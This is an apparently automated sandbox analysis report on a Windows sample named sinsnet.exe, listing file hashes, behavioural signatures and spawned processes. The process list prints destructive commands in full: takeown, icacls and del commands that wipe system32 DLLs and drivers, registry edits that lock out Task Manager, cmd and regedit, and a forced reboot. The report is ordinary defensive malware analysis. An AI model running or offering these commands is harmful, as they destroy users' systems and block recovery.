SHA256 aa9bab3eae8b96112ee8a48327d8a7521b53687f8e470991c98382af3de7b87b
SHA512 c48efc8aafa6084fd0256d29ad21a193ed8e3c359164feaefb7db44e2ad13dc1b6df619d0a48c50a87f33681812cfe3b9488098da4ac59adf0c50d03090b4a25

C:\Windows\Debug\WIA\wiatrace.log

MD5 361bd4ef293fc0928bc8607e90b61187
SHA1 e7c1c037d74085151fe309536e9a07584755e57d
SHA256 fe85ffb6ee04bea6845bb1259ba5f41dafd72a0381df3228d7da51f567a8b01a
SHA512 d820df330633812de80167f6e37cc77697b1668718fe681b7744a07b07ec6fcdffd58fa19fb099066d58381da63ad303a55e93f8943186eaea672598114c49f1

C:\Windows\Debug\WIA\wiatrace.log

MD5 0f0971719f5e1f9422a640ec06b93a8c
SHA1 0694c74475f1734d4e1f4d6ba79631224d6536bc
SHA256 f33e829ef1554a47afeccdc1caf17d2832a4c849ae51215ee3ca1ca43a22784e
SHA512 5f1c62941ca89a6b0d96191700dd3b14ecd56dd44a3cf81c7e6b5fb5e85361003bfa75cb5c07feeae6de628bfd2c3f78c3d61495062146a9ff15f34e904c7828

C:\Windows\Debug\WIA\wiatrace.log

MD5 b0271d82494957ce37d0fc4f187429e2
SHA1 93b7e78748e6c1a63e380c1863cb0ca93e3da6fe
SHA256 5e06adb2c4b3f44f01d03b610dd6d8333c4bddb6fa3fbc6402491be4542570d4
SHA512 2de1f8726faef6cd44ae49bff14c303aa2a44eb50baa066ed146ffd17fc4539a4922afd9f7137a6cecbc54df2d23876ed3ed7d8a93d16ee92de6e4ab2036273f

C:\Windows\Debug\WIA\wiatrace.log

MD5 4004876cc8c2ff36099dd41d8bf77688
SHA1 7af2e2c7ae5d862bfafa69a5a8472270c5b560aa
SHA256 d72856484a068dfc0f84dfcc6d13cd8bff1000d13f0e4820e12355d1a06b9bd9
SHA512 b630e8c138245c9b45d6deba2d5c0ea24e3d56447bcdcdf72dd944c67e40fad4ecbafa476b35dfc160be208a20f5665d3b7013f03fc49c437712f63e4f46f11a

C:\Windows\Debug\WIA\wiatrace.log

MD5 f3b509fd0798c68704a34c671faa5a90
SHA1 85a7b9398ab0d72960685c0b60156bfd58f81460
SHA256 4d546b4e913e840ebabf2a7d3aef76d4fd1c8b6de0611508b3893051f207ccad
SHA512 3446c1ce350440dbf206e28c9c80eeccc8e5893e2d406a9eb72081abe4ce10678de3371a43642d7d3a8300a1dabf3c3e8ef9d25c5cbe04100b815625182147ce

C:\Windows\Debug\WIA\wiatrace.log

MD5 950fc032f53f96bd7b0fbb79088737bf
SHA1 3941ca2053d2621c4a55b773a1b06ddcbe901414
SHA256 adcac89a0f23a9189e84e17325e8352873d94ee2def6bb6d362041bce7f25d01
SHA512 c22c20f683569be6bee05da0430862756e22dc91c2f8c5990530e8a40290ba3599f74322fd080f3b9999f6b740e4c0f48bcd084ccf10569c4a1ba3f7f90f834a

C:\Windows\Debug\WIA\wiatrace.log

MD5 9bc71bca9461726c2df8cb353c23e1bc
SHA1 fec41e7a1995e329cb2b73b12fe06e61c5f1a62d
SHA256 d99d4e38a005e9f04764eb7c2be8dde38ec02b097ea915854d4464ba9c56da97
SHA512 d4f2c6f94b716777516b8d7d0276ebab44e79967c49f743f30d60563143510d07e17f4780eb9382966714c09bc9c1b6fcdbc67024230cb3c43494acee0d8326a

C:\Windows\Debug\WIA\wiatrace.log

MD5 c7e42af86120fa9c5be79994ddcf473e
SHA1 0b4915afe822002fae54e58d5c1b6616a67561f3
SHA256 bc1003f7d8a6cebe484ddeb4ba83b8d02e896c57bab407b1768591fe37c20778
SHA512 deaa04a4c3014ac53e85c450a5bd8655dde6fde52808c4254ec9911672676193b9bc7991bcbe3322803e025a87351b1e61eb7b821f36a4e49500ab296f652e87

C:\Windows\Debug\WIA\wiatrace.log

MD5 d94229c1a91f58e57760be58392fdfd6
SHA1 3c160620e6a0e5bcd9dfa686c3a9db2198be38d8
SHA256 1dab27568241f5085021462fb32ad716986d6fc1a409d166bd50b35e82a265fd
SHA512 44dd8fd5eff9e24718135fa7ef9a6a1e0e0e98c531ce4ed499ef33be76c88c0105c67997cc21dcf800e91d63c76ce3c6def76e0beeed3dc0238f4bc4b2a987d9

C:\Windows\Debug\WIA\wiatrace.log

MD5 05c75f1d2357213de807e8eea1f60c27
SHA1 8eb55f124f156d84c611b93d3326226a8d26fdcd
SHA256 681690dba33a7b4aba9cb26520944f86d9d5e640d73d5bceadc010febe57bcee
SHA512 2fe408d1111f301ba3f032df50e02f41bbf5c48621b548dde2b482bbf420735181365e36980bff79c41d144a027dff1252b41a239d5ce00c72bceebf2368a3c3

C:\Windows\Debug\WIA\wiatrace.log

MD5 26d19e1a4351c7d8b713ee41ff7d4280
SHA1 6a8b6e2d5e10ca000282a81e9b392a62c7c76995
SHA256 648e8c8dd9e69d321989c585381ac20cef2216def100cb7ac37b2cdc5a999136
SHA512 3c2b3fe2c437d14faf5fdb67e73bb518d4937972c000ad8313f34e95caf69ef60734ad7c016241db17c93b5ef6e934520adf7264bc380db11be69de3ba9c3f1d

C:\Windows\Debug\WIA\wiatrace.log

MD5 6913be96ba6e16dfcf8eb72070cd6d2a
SHA1 80b3c7feea127e8127b28ffac2c119514af12088
SHA256 898499365312356e8006f299e45ea1058a765eb7ed9067f3967fc603e171b59c
SHA512 e5f49b72d788a29dfaa452fa0c81102da0f759f7b609cc554c8d926ad400ee321678d2e55a6a100f964233099fc019276d85481133a9f7da5030742b6d2cfef3

C:\Windows\Debug\WIA\wiatrace.log

MD5 75f9c0d5a51d7e1b591e8299481940f5
SHA1 c045f6ab5641c478eaa8a900f822573625cbcb02
SHA256 2464a178ba0141093fb1ad8e624e29e75b555c6890f48c4b27cef90fbb96b4b9
SHA512 5956a02bc425a95f379c811a097b0a3486fa2f6738bdfa1b15f13180eade4242a57ee06601307f8ee86e702a645af9353de74328f271b6d6a186a957103d349c

C:\Windows\Debug\WIA\wiatrace.log

MD5 612ade3231a4763d00d2b677f5fc0e37
SHA1 884d40f290a6af52c7cb28d5130258ced94a6985
SHA256 47f781b7b63f4e4e581a168218ddb9f1e2126dba0ab5ffeafbf6edd8046cf7a5
SHA512 ffbd721362da06a64e9211aff5848cd90ea62f6ac982efde8b40921c6fbf1928d3dd256e05ddd7e23960a8f2fbde97d3eb018b2a860ea87baa508f4b29b31100

C:\Windows\Debug\WIA\wiatrace.log

MD5 6f0a8c808512ccd81f2a1c14f4bbf6a8
SHA1 8026e744146937a548ca37476402409d20ad5163
SHA256 17f5d6ede9b296c59667074e5b610f7dc90fa54b65d3a1810b2e4be92dc6e5e6
SHA512 6431080c75e55b32581f71ecfac2b94e4c0a711a6f11899b51c83f721bae470ffd85079e438aa768ff632c7f64db6a299e9e8240f244a306323307f79bb85956

C:\Windows\Debug\WIA\wiatrace.log

MD5 f0e637b6c23677cb6e6cc537332483c3
SHA1 92bd7970f2bc0690093a4fa2ea8f92a8c18c0905
SHA256 f6cd7624fda8b40eed431c7c81dad40a4ae4fb22bc920580d6b2a83fff1fb146
SHA512 fe98dca72e606987aa703ab3bea7018f4c52e22fe4524fe5fbee65c7c440bb3fa552649572a44e217aeeb3cb85619780ea4f7b18ed78b2308d7f647c70fa57dc

C:\Windows\Debug\WIA\wiatrace.log

MD5 88918fd427f29abd0c3b15d8a518a10e
SHA1 093bb84c23acd1de5a55b7197d584e4ab3ccc7f9
SHA256 ed62555a5e4dcdc95b600154a594a92a798ea0f9d932b4270747b0dcbfef401e
SHA512 4533b453a81892885a0c8b15e390f420cf6a92217bb67db568dc8a4edd21b44ae8d46507433e7af3eef6b8ff793beeafdb30bf38a327a1edc60e5bbd7f705375

memory/752-27-0x00007FF673FE0000-0x00007FF674181000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-08-06 10:04

Reported

2024-08-06 10:06

Platform

win7-20240708-en

Max time kernel

103s

Max time network

104s

Command Line

"C:\Users\Admin\AppData\Local\Temp\sinsnet.exe"

Signatures

Disables RegEdit via registry modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" C:\Windows\System32\reg.exe N/A

Disables Task Manager via registry modification

evasion

Disables cmd.exe use via registry modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableCMD = "1" C:\Windows\System32\reg.exe N/A

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A

Enumerates physical storage devices

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\System32\reg.exe N/A
N/A N/A C:\Windows\System32\reg.exe N/A
N/A N/A C:\Windows\System32\reg.exe N/A
N/A N/A C:\Windows\System32\reg.exe N/A
N/A N/A C:\Windows\System32\reg.exe N/A
N/A N/A C:\Windows\System32\reg.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\shutdown.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\shutdown.exe N/A
Token: 33 N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: 33 N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\AUDIODG.EXE N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2688 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\cmd.exe
PID 2688 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\cmd.exe
PID 2688 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\cmd.exe
PID 2688 wrote to memory of 2816 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\cmd.exe
PID 2688 wrote to memory of 2816 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\cmd.exe
PID 2688 wrote to memory of 2816 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\cmd.exe
PID 2688 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 2688 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 2688 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 2692 wrote to memory of 2752 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2692 wrote to memory of 2752 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2692 wrote to memory of 2752 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2688 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 2688 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 2688 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 2688 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 2688 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 2688 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 2688 wrote to memory of 2800 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 2688 wrote to memory of 2800 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 2688 wrote to memory of 2800 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 2688 wrote to memory of 1760 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 2688 wrote to memory of 1760 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 2688 wrote to memory of 1760 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 2688 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 2688 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 2688 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 2816 wrote to memory of 2568 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2816 wrote to memory of 2568 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2816 wrote to memory of 2568 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2688 wrote to memory of 2396 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 2688 wrote to memory of 2396 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 2688 wrote to memory of 2396 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 2816 wrote to memory of 2640 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 2816 wrote to memory of 2640 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 2816 wrote to memory of 2640 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 2688 wrote to memory of 1816 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 2688 wrote to memory of 1816 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 2688 wrote to memory of 1816 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 2692 wrote to memory of 2112 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 2692 wrote to memory of 2112 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 2692 wrote to memory of 2112 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 2688 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 2688 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 2688 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 2688 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 2688 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 2688 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 2688 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 2688 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 2688 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 2688 wrote to memory of 1312 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 2688 wrote to memory of 1312 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 2688 wrote to memory of 1312 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 2688 wrote to memory of 1036 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 2688 wrote to memory of 1036 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 2688 wrote to memory of 1036 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 2688 wrote to memory of 1488 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 2688 wrote to memory of 1488 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 2688 wrote to memory of 1488 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 2688 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 2688 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 2688 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 2688 wrote to memory of 608 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe

Processes

C:\Users\Admin\AppData\Local\Temp\sinsnet.exe

"C:\Users\Admin\AppData\Local\Temp\sinsnet.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f c:\windows\system32\*.dll && icacls c:\windows\system32\*.dll /grant Everyone:(F) && del /s /q c:\windows\system32\*.dll && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f c:\windows\system32\drivers\* && icacls c:\windows\system32\drivers\* /grant Everyone:(F) && del /s /q c:\windows\system32\drivers\* && exit

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\*.dll

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableCMD /t REG_DWORD /d 1 /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\drivers\*

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\drivers\* /grant Everyone:(F)

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\*.dll /grant Everyone:(F)

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\shutdown.exe

"C:\Windows\System32\shutdown.exe" -r -t 0

C:\Windows\system32\LogonUI.exe

"LogonUI.exe" /flags:0x0

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x598

C:\Windows\system32\LogonUI.exe

"LogonUI.exe" /flags:0x1

Network

N/A

Files

